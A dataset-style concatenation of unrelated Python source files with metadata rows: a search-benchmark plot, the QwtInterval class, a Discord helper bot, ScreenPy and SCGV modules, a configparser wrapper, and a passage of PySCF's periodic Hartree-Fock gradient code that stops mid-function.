ax[1][0].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [0.276, 2584.57, 2691.58, ]
ax[1][0].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [0.3912, 4681.72812]
ax[1][0].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[1][1].set(title="Memory", xlabel="sqrt(n_squares)", ylabel="MB")
y1 = [66.48, 66.41, 67.6, ]
ax[1][1].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [66.45, 309.58, 471.43, ]
ax[1][1].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [66.59, 476.1796875]
ax[1][1].plot(x1, y1, label="UCS with Length", color="green", marker='o')
fig.suptitle("Uninformed Search\n(Body length/history included)")
plt.show()
| 37.387755 | 85 | 0.635917 | 338 | 1,832 | 3.431953 | 0.298817 | 0.072414 | 0.155172 | 0.082759 | 0.568103 | 0.47931 | 0.47931 | 0.458621 | 0.458621 | 0.458621 | 0 | 0.153563 | 0.111354 | 1,832 | 48 | 86 | 38.166667 | 0.558968 | 0.009279 | 0 | 0 | 0 | 0 | 0.228776 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7b73c2d804287f3a44881ed33d9604b0a44f4 | 12,074 | py | Python | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | null | null | null | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed under the terms of the Qwt License
# Copyright (c) 2002 Uwe Rathmann, for the original C++ code
# Copyright (c) 2015 Pierre Raybaut, for the Python translation/optimization
# (see LICENSE file for more details)
"""
QwtInterval
-----------
.. autoclass:: QwtInterval
:members:
"""
class QwtInterval(object):
"""
A class representing an interval
The interval is represented by 2 doubles, the lower and the upper limit.
.. py:class:: QwtInterval(minValue=0., maxValue=-1., borderFlags=None)
Build an interval with from min/max values
:param float minValue: Minimum value
:param float maxValue: Maximum value
:param int borderFlags: Include/Exclude borders
"""
# enum BorderFlag
IncludeBorders = 0x00
ExcludeMinimum = 0x01
ExcludeMaximum = 0x02
ExcludeBorders = ExcludeMinimum | ExcludeMaximum
def __init__(self, minValue=0.0, maxValue=-1.0, borderFlags=None):
assert not isinstance(minValue, QwtInterval)
assert not isinstance(maxValue, QwtInterval)
self.__minValue = None
self.__maxValue = None
self.__borderFlags = None
self.setInterval(minValue, maxValue, borderFlags)
def setInterval(self, minValue, maxValue, borderFlags=None):
"""
Assign the limits of the interval
:param float minValue: Minimum value
:param float maxValue: Maximum value
:param int borderFlags: Include/Exclude borders
"""
self.__minValue = float(minValue) # avoid overflows with NumPy scalars
self.__maxValue = float(maxValue) # avoid overflows with NumPy scalars
if borderFlags is None:
self.__borderFlags = self.IncludeBorders
else:
self.__borderFlags = borderFlags
def setBorderFlags(self, borderFlags):
"""
Change the border flags
:param int borderFlags: Include/Exclude borders
.. seealso::
:py:meth:`borderFlags()`
"""
self.__borderFlags = borderFlags
def borderFlags(self):
"""
:return: Border flags
.. seealso::
:py:meth:`setBorderFlags()`
"""
return self.__borderFlags
def setMinValue(self, minValue):
"""
Assign the lower limit of the interval
:param float minValue: Minimum value
"""
self.__minValue = float(minValue) # avoid overflows with NumPy scalars
def setMaxValue(self, maxValue):
"""
Assign the upper limit of the interval
:param float maxValue: Maximum value
"""
self.__maxValue = float(maxValue) # avoid overflows with NumPy scalars
def minValue(self):
"""
:return: Lower limit of the interval
"""
return self.__minValue
def maxValue(self):
"""
:return: Upper limit of the interval
"""
return self.__maxValue
def isValid(self):
"""
A interval is valid when minValue() <= maxValue().
In case of `QwtInterval.ExcludeBorders` it is true
when minValue() < maxValue()
:return: True, when the interval is valid
"""
if (self.__borderFlags & self.ExcludeBorders) == 0:
return self.__minValue <= self.__maxValue
else:
return self.__minValue < self.__maxValue
def width(self):
"""
The width of invalid intervals is 0.0, otherwise the result is
maxValue() - minValue().
:return: the width of an interval
"""
if self.isValid():
return self.__maxValue - self.__minValue
else:
return 0.0
def __and__(self, other):
return self.intersect(other)
def __iand__(self, other):
self = self & other
return self
def __or__(self, other):
if isinstance(other, QwtInterval):
return self.unite(other)
else:
return self.extend(other)
def __ior__(self, other):
self = self | other
return self
def __eq__(self, other):
return (
self.__minValue == other.__minValue
and self.__maxValue == other.__maxValue
and self.__borderFlags == other.__borderFlags
)
def __ne__(self, other):
return not self.__eq__(other)
def isNull(self):
"""
:return: true, if isValid() && (minValue() >= maxValue())
"""
return self.isValid() and self.__minValue >= self.__maxValue
def invalidate(self):
"""
The limits are set to interval [0.0, -1.0]
.. seealso::
:py:meth:`isValid()`
"""
self.__minValue = 0.0
self.__maxValue = -1.0
def normalized(self):
"""
Normalize the limits of the interval
If maxValue() < minValue() the limits will be inverted.
:return: Normalized interval
.. seealso::
:py:meth:`isValid()`, :py:meth:`inverted()`
"""
if self.__minValue > self.__maxValue:
return self.inverted()
elif (
self.__minValue == self.__maxValue
and self.__borderFlags == self.ExcludeMinimum
):
return self.inverted()
else:
return self
def inverted(self):
"""
Invert the limits of the interval
:return: Inverted interval
.. seealso::
:py:meth:`normalized()`
"""
borderFlags = self.IncludeBorders
if self.__borderFlags & self.ExcludeMinimum:
borderFlags |= self.ExcludeMaximum
if self.__borderFlags & self.ExcludeMaximum:
borderFlags |= self.ExcludeMinimum
return QwtInterval(self.__maxValue, self.__minValue, borderFlags)
def contains(self, value):
"""
Test if a value is inside an interval
:param float value: Value
:return: true, if value >= minValue() && value <= maxValue()
"""
if not self.isValid():
return False
elif value < self.__minValue or value > self.__maxValue:
return False
elif value == self.__minValue and self.__borderFlags & self.ExcludeMinimum:
return False
elif value == self.__maxValue and self.__borderFlags & self.ExcludeMaximum:
return False
else:
return True
def unite(self, other):
"""
Unite two intervals
:param qwt.interval.QwtInterval other: other interval to united with
:return: united interval
"""
if not self.isValid():
if not other.isValid():
return QwtInterval()
else:
return other
elif not other.isValid():
return self
united = QwtInterval()
flags = self.IncludeBorders
# minimum
if self.__minValue < other.minValue():
united.setMinValue(self.__minValue)
flags &= self.__borderFlags & self.ExcludeMinimum
elif other.minValue() < self.__minValue:
united.setMinValue(other.minValue())
flags &= other.borderFlags() & self.ExcludeMinimum
else:
united.setMinValue(self.__minValue)
flags &= (self.__borderFlags & other.borderFlags()) & self.ExcludeMinimum
# maximum
if self.__maxValue > other.maxValue():
united.setMaxValue(self.__maxValue)
flags &= self.__borderFlags & self.ExcludeMaximum
elif other.maxValue() > self.__maxValue:
united.setMaxValue(other.maxValue())
flags &= other.borderFlags() & self.ExcludeMaximum
else:
united.setMaxValue(self.__maxValue)
flags &= self.__borderFlags & other.borderFlags() & self.ExcludeMaximum
united.setBorderFlags(flags)
return united
def intersect(self, other):
"""
Intersect two intervals
:param qwt.interval.QwtInterval other: other interval to intersect with
:return: intersected interval
"""
if not other.isValid() or not self.isValid():
return QwtInterval()
i1 = self
i2 = other
if i1.minValue() > i2.minValue():
i1, i2 = i2, i1
elif i1.minValue() == i2.minValue():
if i1.borderFlags() & self.ExcludeMinimum:
i1, i2 = i2, i1
if i1.maxValue() < i2.maxValue():
return QwtInterval()
if i1.maxValue() == i2.minValue():
if (
i1.borderFlags() & self.ExcludeMaximum
or i2.borderFlags() & self.ExcludeMinimum
):
return QwtInterval()
intersected = QwtInterval()
flags = self.IncludeBorders
intersected.setMinValue(i2.minValue())
flags |= i2.borderFlags() & self.ExcludeMinimum
if i1.maxValue() < i2.maxValue():
intersected.setMaxValue(i1.maxValue())
flags |= i1.borderFlags() & self.ExcludeMaximum
elif i2.maxValue() < i1.maxValue():
intersected.setMaxValue(i2.maxValue())
flags |= i2.borderFlags() & self.ExcludeMaximum
else: # i1.maxValue() == i2.maxValue()
intersected.setMaxValue(i1.maxValue())
flags |= i1.borderFlags() & i2.borderFlags() & self.ExcludeMaximum
intersected.setBorderFlags(flags)
return intersected
def intersects(self, other):
"""
Test if two intervals overlap
:param qwt.interval.QwtInterval other: other interval
:return: True, when the intervals are intersecting
"""
if not other.isValid() or not self.isValid():
return False
i1 = self
i2 = other
if i1.minValue() > i2.minValue():
i1, i2 = i2, i1
elif i1.minValue() == i2.minValue() and i1.borderFlags() & self.ExcludeMinimum:
i1, i2 = i2, i1
if i1.maxValue() > i2.minValue():
return True
elif i1.maxValue() == i2.minValue():
return (
i1.borderFlags() & self.ExcludeMaximum
and i2.borderFlags() & self.ExcludeMinimum
)
return False
def symmetrize(self, value):
"""
Adjust the limit that is closer to value, so that value becomes
the center of the interval.
:param float value: Center
:return: Interval with value as center
"""
if not self.isValid():
return self
delta = max([abs(value - self.__maxValue), abs(value - self.__minValue)])
return QwtInterval(value - delta, value + delta)
def limited(self, lowerBound, upperBound):
"""
Limit the interval, keeping the border modes
:param float lowerBound: Lower limit
:param float upperBound: Upper limit
:return: Limited interval
"""
if not self.isValid() or lowerBound > upperBound:
return QwtInterval()
minValue = max([self.__minValue, lowerBound])
minValue = min([minValue, upperBound])
maxValue = max([self.__maxValue, lowerBound])
maxValue = min([maxValue, upperBound])
return QwtInterval(minValue, maxValue, self.__borderFlags)
def extend(self, value):
"""
Extend the interval
If value is below minValue(), value becomes the lower limit.
If value is above maxValue(), value becomes the upper limit.
extend() has no effect for invalid intervals
:param float value: Value
:return: extended interval
"""
if not self.isValid():
return self
return QwtInterval(min([value, self.__minValue]), max([value, self.__maxValue]))
| 30.185 | 88 | 0.574292 | 1,185 | 12,074 | 5.716456 | 0.140928 | 0.062002 | 0.051373 | 0.017715 | 0.348686 | 0.267936 | 0.201211 | 0.165633 | 0.147033 | 0.103041 | 0 | 0.011757 | 0.330793 | 12,074 | 399 | 89 | 30.260652 | 0.826609 | 0.268262 | 0 | 0.359375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001537 | 0 | 0.010417 | 1 | 0.140625 | false | 0 | 0 | 0.015625 | 0.385417 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7bb628a6a7b8d2e574583f0e3bb6818cbf97d | 890 | py | Python | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | 8 | 2017-03-31T19:55:36.000Z | 2021-01-22T09:11:40.000Z | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | null | null | null | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | 2 | 2019-06-11T09:07:01.000Z | 2020-09-25T02:30:22.000Z | '''
Created on Dec 21, 2016
@author: lubo
'''
# from matplotlib import cm
import matplotlib.pyplot as plt
from scgv.views.base import ViewerBase
class ErrorViewer(ViewerBase):
NORMALIZE_ERROR_MIN = 0
NORMALIZE_ERROR_MAX = 50
def __init__(self, model):
super(ErrorViewer, self).__init__(model)
def draw_error(self, ax):
if self.model.error is not None:
ax.imshow(
[self.model.error],
aspect='auto',
interpolation='nearest',
# cmap=cm.coolwarm, # @UndefinedVariable
cmap=plt.get_cmap('Greys'),
# vmin=self.NORMALIZE_ERROR_MIN,
# vmax=self.NORMALIZE_ERROR_MAX,
extent=self.model.bar_extent)
ax.set_xticks([])
ax.set_xticklabels([])
ax.set_yticks([0.5])
ax.set_yticklabels(["Error"])
| 26.969697 | 57 | 0.585393 | 102 | 890 | 4.882353 | 0.558824 | 0.11245 | 0.068273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017771 | 0.304494 | 890 | 32 | 58 | 27.8125 | 0.786753 | 0.186517 | 0 | 0 | 0 | 0 | 0.029494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7c360408bbe93d3e1ff73abf1d6e934ab7b5e | 3,106 | py | Python | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | import discord
import os
import json
import numpy as np
import reddit_functions as rf
import billboard_functions as bf
import st
import activities as act
with open("keys.json") as f:
info = json.load(f)
headers = ['Task', 'Start', 'End']
todolist = np.empty(shape=[0,3])
client = discord.Client()
@client.event
async def on_ready():
print('We have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
#good news subreddit
if message.content.startswith('!goodnews'):
news, link = rf.good_news()
await message.channel.send("Here's some good news\n\n" +
news + "\n" + link)
#gives movie game or TV show
elif message.content.startswith('!activity '):
answer = ""
genre = message.content.split(' ')
if len(genre) > 0:
genre = genre[1]
if genre == "game":
answer = act.game()
if genre == "TV":
answer = act.television()
if genre == "movie":
answer = act.movie()
await message.channel.send(answer)
return
elif message.content.startswith('!song'):
charts = bf.random_queue()
await message.channel.send(charts)
elif message.content.startswith('!today'):
embedVar = discord.Embed(title="Daily Dashboard", description=" ", color=discord.Color.teal())
rlink = rf.dailypic().url
embedVar.set_thumbnail(url=rlink)
embedVar.add_field(name='Post of the Day', value=rlink, inline=False)
embedVar.add_field(name="Music's Top 5", value=bf.top_five(), inline=False)
embedVar.add_field(name="Self Care Tip of the Day", value=bl.bucketRandom(), inline=False)
embedVar.set_footer(text='Source: https://wholefully.com/self-care-ideas/')
await message.channel.send(embed=embedVar)
elif st.contains(message.content)[0]:
info = st.contains(message.content)
await message.channel.send(st.are_you_okay(info[1]))
###Calendar/To Do List
elif message.content.startswith('!addtask'):
global todolist
args = message.content.split(' ')
task = args[1]
start = args[2]
end = args[3]
item = np.array([task, start, end])
todolist = np.append(todolist, [item], axis=0)
todolist = todolist[todolist[:, 1].argsort()]
print(todolist)
await message.channel.send('Task added')
elif message.content.startswith('!todo'):
await message.channel.send(headers)
for item in todolist:
await message.channel.send(item)
elif message.content.startswith('!done'):
args = message.content.split(' ')[1]
for item in range(len(todolist)):
if args == todolist[item][0]:
await message.channel.send("Congrats on finishing " + args + "!")
todolist = np.delete(todolist, item, axis=0)
client.run(info["discord"]["discord_token"]) | 27.732143 | 102 | 0.602382 | 381 | 3,106 | 4.871391 | 0.383202 | 0.090517 | 0.092134 | 0.11153 | 0.119612 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0.007014 | 0.265615 | 3,106 | 112 | 103 | 27.732143 | 0.806664 | 0.020927 | 0 | 0.054054 | 0 | 0 | 0.101087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.108108 | 0 | 0.135135 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7f32507663d90e0ff10ef753ae015dfc6bc18 | 1,044 | py | Python | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 8 | 2022-02-23T18:40:13.000Z | 2022-03-20T06:27:30.000Z | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 7 | 2022-01-13T07:01:40.000Z | 2022-03-31T15:45:13.000Z | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 2 | 2022-01-16T09:03:19.000Z | 2022-01-16T09:06:10.000Z | # -*- coding: utf-8 -*-
# ____ ____
# / ___| ___ _ __ ___ ___ _ __ | _ \ _ _
# \___ \ / __| '__/ _ \/ _ \ '_ \| |_) | | | |
# ___) | (__| | | __/ __/ | | | __/| |_| |
# |____/ \___|_| \___|\___|_| |_|_| \__, |
# |___/
"""
ScreenPy
FADE IN:
INT. SITEPACKAGES DIRECTORY
ScreenPy is a composition-based test framework. It is inspired by the
SerenityBDD library for Java.
:copyright: (c) 2019–2022 by Perry Goy.
:license: MIT, see LICENSE for more details.
"""
from .actor import Actor
from .director import Director
from .given_when_then import and_, given, given_that, then, when
# Natural-language-enabling syntactic sugar
AnActor = Actor
__all__ = [
"Actor",
"AnActor",
"Director",
"and_",
"given",
"given_that",
"then",
"when",
]
| 25.463415 | 78 | 0.447318 | 76 | 1,044 | 5.052632 | 0.671053 | 0.041667 | 0.067708 | 0.088542 | 0.130208 | 0.130208 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.428161 | 1,044 | 40 | 79 | 26.1 | 0.626466 | 0.686782 | 0 | 0 | 0 | 0 | 0.169065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b8f9982b50627682d54317043d5eeb11692e19 | 1,470 | py | Python | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | import collections
from six.moves import configparser
class ConfigParserWrapper(object):
def __init__(self):
self._parser = configparser.ConfigParser()
self._file = None
self._defaults = None
def defaults(self):
if self._defaults is None:
self._defaults = self._parser.defaults()
return self._defaults
def read(self, file):
self._file = file
if isinstance(file, str):
self._parser.read(file)
else:
self._parser.readfp(file)
def sections(self):
return self._parser.sections()
def options(self, section, ignore_default=False):
if section == 'DEFAULT':
return self._parser.defaults()
options = collections.OrderedDict()
for option in self._parser.options(section):
value = self._parser.get(section, option)
if ignore_default and value == self.defaults().get(option):
continue
options[option] = self._parser.get(section, option)
return options
def get(self, option, section='DEFAULT'):
options = self.options(section)
if option not in options:
raise configparser.NoOptionError(option, section)
return options.get(option)
def set(self, option, value, section='DEFAULT'):
self._parser.set(section, option, value)
with open(self._file, 'w') as fp:
self._parser.write(fp)
| 30.625 | 71 | 0.616327 | 163 | 1,470 | 5.411043 | 0.294479 | 0.124717 | 0.036281 | 0.045351 | 0.058957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.283673 | 1,470 | 47 | 72 | 31.276596 | 0.837607 | 0 | 0 | 0 | 0 | 0 | 0.014966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.184211 | false | 0 | 0.052632 | 0.026316 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b977d8a31e77d99b632de57227591e1592b23d | 17,115 | py | Python | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 501 | 2018-12-06T23:48:17.000Z | 2022-03-31T11:53:18.000Z | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 710 | 2018-11-26T22:04:52.000Z | 2022-03-30T03:53:12.000Z | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 273 | 2018-11-26T10:10:24.000Z | 2022-03-30T12:25:28.000Z | #!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Yang Gao <younggao1994@gmail.com>
#
'''
Non-relativistic analytical nuclear gradients for restricted Hartree Fock with kpoints sampling
'''
import numpy as np
from pyscf import lib
from pyscf.lib import logger
from pyscf.grad import rhf as molgrad
from pyscf.pbc.gto.pseudo.pp import get_vlocG, get_alphas, get_projG, projG_li, _qli
from pyscf.pbc.dft.numint import eval_ao_kpts
from pyscf.pbc import gto, tools
from pyscf.gto import mole
import scipy
def grad_elec(mf_grad, mo_energy=None, mo_coeff=None, mo_occ=None, atmlst=None):
'''
Electronic part of KRHF/KRKS gradients
Args:
mf_grad : pbc.grad.krhf.Gradients or pbc.grad.krks.Gradients object
'''
mf = mf_grad.base
cell = mf_grad.cell
kpts = mf.kpts
nkpts = len(kpts)
if mo_energy is None: mo_energy = mf.mo_energy
if mo_occ is None: mo_occ = mf.mo_occ
if mo_coeff is None: mo_coeff = mf.mo_coeff
if atmlst is None: atmlst = range(cell.natm)
log = logger.Logger(mf_grad.stdout, mf_grad.verbose)
hcore_deriv = mf_grad.hcore_generator(cell, kpts)
s1 = mf_grad.get_ovlp(cell, kpts)
dm0 = mf.make_rdm1(mo_coeff, mo_occ)
t0 = (logger.process_clock(), logger.perf_counter())
log.debug('Computing Gradients of NR-HF Coulomb repulsion')
vhf = mf_grad.get_veff(dm0, kpts)
log.timer('gradients of 2e part', *t0)
dme0 = mf_grad.make_rdm1e(mo_energy, mo_coeff, mo_occ)
aoslices = cell.aoslice_by_atom()
de = np.zeros([len(atmlst),3])
for x, ia in enumerate(atmlst):
p0, p1 = aoslices[ia,2:]
h1ao = hcore_deriv(ia)
de[x] += np.einsum('xkij,kji->x', h1ao, dm0).real
# nabla was applied on bra in vhf, *2 for the contributions of nabla|ket>
de[x] += np.einsum('xkij,kji->x', vhf[:,:,p0:p1], dm0[:,:,p0:p1]).real * 2
de[x] -= np.einsum('kxij,kji->x', s1[:,:,p0:p1], dme0[:,:,p0:p1]).real * 2
de[x] /= nkpts
de[x] += mf_grad.extra_force(ia, locals())
if log.verbose > logger.DEBUG:
log.debug('gradients of electronic part')
mf_grad._write(log, cell, de, atmlst)
return de
def _make_fakemol():
fakemol = mole.Mole()
fakemol._atm = np.zeros((1,mole.ATM_SLOTS), dtype=np.int32)
fakemol._bas = np.zeros((1,mole.BAS_SLOTS), dtype=np.int32)
ptr = mole.PTR_ENV_START
fakemol._env = np.zeros(ptr+10)
fakemol._bas[0,mole.NPRIM_OF ] = 1
fakemol._bas[0,mole.NCTR_OF ] = 1
fakemol._bas[0,mole.PTR_EXP ] = ptr+3
fakemol._bas[0,mole.PTR_COEFF] = ptr+4
return fakemol
def get_hcore(cell, kpts):
'''Part of the nuclear gradients of core Hamiltonian'''
h1 = np.asarray(cell.pbc_intor('int1e_ipkin', kpts=kpts))
dtype = h1.dtype
if cell._pseudo:
SI=cell.get_SI()
Gv = cell.Gv
natom = cell.natm
coords = cell.get_uniform_grids()
ngrids = len(coords)
vlocG = get_vlocG(cell)
vpplocG = -np.einsum('ij,ij->j', SI, vlocG)
vpplocG[0] = np.sum(get_alphas(cell))
vpplocR = tools.ifft(vpplocG, cell.mesh).real
fakemol = _make_fakemol()
ptr = mole.PTR_ENV_START
for kn, kpt in enumerate(kpts):
aos = eval_ao_kpts(cell, coords, kpt, deriv=1)[0]
vloc = np.einsum('agi,g,gj->aij', aos[1:].conj(), vpplocR, aos[0])
expir = np.exp(-1j*np.dot(coords, kpt))
aokG = np.asarray([tools.fftk(np.asarray(ao.T, order='C'),
cell.mesh, expir).T for ao in aos])
Gk = Gv + kpt
G_rad = lib.norm(Gk, axis=1)
vnl = np.zeros(vloc.shape, dtype=np.complex128)
for ia in range(natom):
symb = cell.atom_symbol(ia)
if symb not in cell._pseudo:
continue
pp = cell._pseudo[symb]
for l, proj in enumerate(pp[5:]):
rl, nl, hl = proj
if nl >0:
hl = np.asarray(hl)
fakemol._bas[0,mole.ANG_OF] = l
fakemol._env[ptr+3] = .5*rl**2
fakemol._env[ptr+4] = rl**(l+1.5)*np.pi**1.25
pYlm_part = fakemol.eval_gto('GTOval', Gk)
pYlm = np.empty((nl,l*2+1,ngrids))
for k in range(nl):
qkl = _qli(G_rad*rl, l, k)
pYlm[k] = pYlm_part.T * qkl
SPG_lmi = np.einsum('g,nmg->nmg', SI[ia].conj(), pYlm)
SPG_lm_aoG = np.einsum('nmg,agp->anmp', SPG_lmi, aokG)
tmp = np.einsum('ij,ajmp->aimp', hl, SPG_lm_aoG[1:])
vnl += np.einsum('aimp,imq->apq', tmp.conj(), SPG_lm_aoG[0])
vnl *= (1./ngrids**2)
if dtype == np.float64:
h1[kn,:] += vloc.real + vnl.real
else:
h1[kn,:] += vloc + vnl
else:
raise NotImplementedError
return h1
def get_ovlp(cell, kpts):
return -np.asarray(cell.pbc_intor('int1e_ipovlp', kpts=kpts))
def hcore_generator(mf, cell=None, kpts=None):
if cell is None: cell = mf.cell
if kpts is None: kpts = mf.kpts
h1 = get_hcore(cell, kpts)
dtype = h1.dtype
aoslices = cell.aoslice_by_atom()
SI=cell.get_SI() ##[natom ,grid]
mesh = cell.mesh
Gv = cell.Gv ##[grid, 3]
ngrids = len(Gv)
coords = cell.get_uniform_grids()
vlocG = get_vlocG(cell) ###[natom, grid]
ptr = mole.PTR_ENV_START
def hcore_deriv(atm_id):
shl0, shl1, p0, p1 = aoslices[atm_id]
symb = cell.atom_symbol(atm_id)
fakemol = _make_fakemol()
vloc_g = 1j * np.einsum('ga,g->ag', Gv, SI[atm_id]*vlocG[atm_id])
nkpts, nao = h1.shape[0], h1.shape[2]
hcore = np.zeros([3,nkpts,nao,nao], dtype=h1.dtype)
for kn, kpt in enumerate(kpts):
ao = eval_ao_kpts(cell, coords, kpt)[0]
rho = np.einsum('gi,gj->gij',ao.conj(),ao)
for ax in range(3):
vloc_R = tools.ifft(vloc_g[ax], mesh).real
vloc = np.einsum('gij,g->ij', rho, vloc_R)
hcore[ax,kn] += vloc
rho = None
aokG= tools.fftk(np.asarray(ao.T, order='C'),
mesh, np.exp(-1j*np.dot(coords, kpt))).T
ao = None
Gk = Gv + kpt
G_rad = lib.norm(Gk, axis=1)
if symb not in cell._pseudo: continue
pp = cell._pseudo[symb]
for l, proj in enumerate(pp[5:]):
rl, nl, hl = proj
if nl >0:
hl = np.asarray(hl)
fakemol._bas[0,mole.ANG_OF] = l
fakemol._env[ptr+3] = .5*rl**2
fakemol._env[ptr+4] = rl**(l+1.5)*np.pi**1.25
pYlm_part = fakemol.eval_gto('GTOval', Gk)
pYlm = np.empty((nl,l*2+1,ngrids))
for k in range(nl):
qkl = _qli(G_rad*rl, l, k)
pYlm[k] = pYlm_part.T * qkl
SPG_lmi = np.einsum('g,nmg->nmg', SI[atm_id].conj(), pYlm)
SPG_lm_aoG = np.einsum('nmg,gp->nmp', SPG_lmi, aokG)
SPG_lmi_G = 1j * np.einsum('nmg, ga->anmg', SPG_lmi, Gv)
SPG_lm_G_aoG = np.einsum('anmg, gp->anmp', SPG_lmi_G, aokG)
tmp_1 = np.einsum('ij,ajmp->aimp', hl, SPG_lm_G_aoG)
tmp_2 = np.einsum('ij,jmp->imp', hl, SPG_lm_aoG)
vppnl = (np.einsum('imp,aimq->apq', SPG_lm_aoG.conj(), tmp_1) +
np.einsum('aimp,imq->apq', SPG_lm_G_aoG.conj(), tmp_2))
vppnl *=(1./ngrids**2)
if dtype==np.float64:
hcore[:,kn] += vppnl.real
else:
hcore[:,kn] += vppnl
hcore[:,kn,p0:p1] -= h1[kn,:,p0:p1]
